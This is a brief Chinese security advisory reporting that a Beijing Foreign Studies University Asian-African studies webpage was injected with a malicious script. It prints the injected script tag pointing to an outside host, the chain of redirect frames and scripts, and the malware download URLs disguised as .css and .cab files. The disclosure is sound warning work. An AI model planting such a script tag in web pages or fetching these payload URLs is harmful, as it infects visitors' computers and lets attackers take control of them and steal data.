北京外国语大学亚非学院被植入恶意代码
北京外国语大学亚非学院(http://aa.bfsu.edu.cn/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。
MalUrl:http://aa.bfsu.edu.cn/
网页被嵌入恶意链接代码:
<script src=http://zsb.lyge.cn/z.js></script>
挂马分析:
[wide]http://aa.bfsu.edu.cn/
[script]http://zsb.lyge.cn/z.js
[frame]http://erdfy.cn:338/a0036159/a03.htm
[frame]http://erdfy.cn:338/a0036159/new.html
[script]http://erdfy.cn:338/a0036159/../xnnn.js
[script]http://erdfy.cn:338/a0036159/../zhin.js
[frame]http://erdfy.cn:338/a0036159/../apple4.htm
[frame]http://erdfy.cn:338/a0036159/fx.htm
[frame]http://erdfy.cn:338/a0036159/../active.htm
[frame]http://erdfy.cn:338/a0036159/../cx.htm
[frame]http://erdfy.cn:338/a0036159/../real10.htm
[frame]http://erdfy.cn:338/a0036159/../real11.htm
[script]http://erdfy.cn:338/a0036159/../wewew.js
[script]http://count7.51much.com/cnt.php?uid=ua-1-13197&style=text&text=网站统计
最终下载病毒文件:
http://c0jm.com:333/neww/lzz.css
http://c0jm.com:333/neww/as.css
http://c0jm.com:333/neww/bf.css
http://c0jm.com:333/neww/ms.css
http://c0DSm.com:333/neww/adr.css
http://c0jm.com:333/neww/re.css
http://c0jm.com:333/neww/real11.css
http://c0jm.com:333/Baidu.cab
通过执行以上病毒文件,来达到完全控制访问者的系统。
关键字:北京外国语大学